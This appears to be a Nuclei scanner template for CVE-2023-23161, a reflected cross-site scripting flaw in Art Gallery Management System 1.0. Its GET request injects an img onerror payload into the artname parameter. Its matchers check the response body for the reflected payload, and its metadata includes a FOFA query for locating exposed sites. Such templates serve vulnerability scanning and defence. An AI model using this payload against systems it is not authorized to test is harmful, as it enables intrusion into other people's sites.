57 lines
2.3 KiB
YAML
57 lines
2.3 KiB
YAML
id: CVE-2023-23161
|
|
|
|
info:
|
|
name: Art Gallery Management System Project v1.0 - Cross-Site Scripting
|
|
author: ctflearner
|
|
severity: medium
|
|
description: |
|
|
A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51214
|
|
- https://github.com/rahulpatwari/CVE/blob/main/CVE-2023-23161/CVE-2023-23161.txt
|
|
- https://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-23161
|
|
- http://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-23161
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00107
|
|
epss-percentile: 0.43178
|
|
cpe: cpe:2.3:a:phpgurukul:art_gallery_management_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: phpgurukul
|
|
product: art_gallery_management_system
|
|
fofa-query: title="Art Gallery Management System"
|
|
tags: cve2023,cve,packetstorm,art,gallery,xss,art_gallery_management_system_project
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'center"><img src=1 onerror=alert(document.domain)>'
|
|
- 'Art Type'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100ea898a0ee3e7998bb3be0741ebb31686b6746789bfc38aa09c3d751d6c088dd9022100f24fab6cecd2ddc7672fa6f8c51dfc9851aed21ab09178b2994b03ef0a42b92c:922c64590222798bb761d5b6d8e72950 |